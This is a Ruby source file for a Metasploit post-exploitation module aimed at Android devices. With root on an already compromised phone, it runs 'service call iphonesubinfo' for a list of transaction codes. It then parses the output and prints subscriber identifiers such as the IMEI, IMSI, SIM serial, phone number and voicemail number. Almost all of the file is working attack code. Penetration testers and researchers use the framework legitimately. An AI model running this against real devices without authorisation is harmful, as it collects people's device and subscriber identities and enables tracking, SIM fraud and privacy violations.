metasploit-framework/modules/post/android/gather/sub_info.rb

106 lines
2.6 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::Android::Priv
include Msf::Post::Android::System
def initialize(info={})
super( update_info( info, {
'Name' => "extracts subscriber info from target device",
'Description' => %q{
This module displays the subscriber info stored on the target phone.
It uses call service to get values of each transaction code like imei etc.
},
'License' => MSF_LICENSE,
'Author' => ['Auxilus'],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Platform' => 'android',
}
))
end
def run
unless is_root?
print_error("This module requires root permissions.")
return
end
@transaction_codes ||= [
'DeviceId',
'DeviceIdForSubscriber',
'ImeiForSubscriber',
'DeviceSvn',
'SubscriberId',
'SubscriberIdForSubscriber',
'GroupIdLevel1',
'GroupIdLevel1ForSubscriber',
'IccSerialNumber',
'IccSerialNumberForSubscriber',
'Line1Number',
'Line1NumberForSubscriber',
'Line1AlphaTag',
'Line1AlphaTagForSubscriber',
'Msisdn',
'MsisdnForSubscriber',
'VoiceMailNumber',
'VoiceMailNumberForSubscriber',
'CompleteVoiceMailNumber',
'CompleteVoiceMailNumberForSubscriber',
'VoiceMailAlphaTag',
'VoiceMailAlphaTagForSubscriber',
'IsimImpi',
'IsimDomain',
'IsimImpu',
'IsimIst',
'IsimPcscf',
'IsimChallengeResponse',
'IccSimChallengeResponse'
]
values ||= []
arr ||= []
for code in 1..@transaction_codes.length do
print_status("using code : #{code}")
cmd = "service call iphonesubinfo #{code}"
block = cmd_exec(cmd)
value,tc = get_val(block, code)
arr << [tc, value]
end
tc_tbl = Rex::Text::Table.new(
'Header' => 'Subscriber info',
'Indent' => 1,
'Columns' => ['transaction code', 'value']
)
arr.each do |a|
tc_tbl << [
a[0], # TRANSACTION CODE
a[1] # value
]
end
print_line(tc_tbl.to_s)
end
def get_val(data, code)
parsed = data.gsub(/Parcel/, '')
string = ''
100.times do |i|
next if i % 2 == 0
str = parsed.split("'")[i]
break if str.nil?
string += str
end
v = ''
string.split(".").each do |chr|
next if chr.nil? or chr == "\n"
v += chr
end
return v,@transaction_codes[code-1]
end
end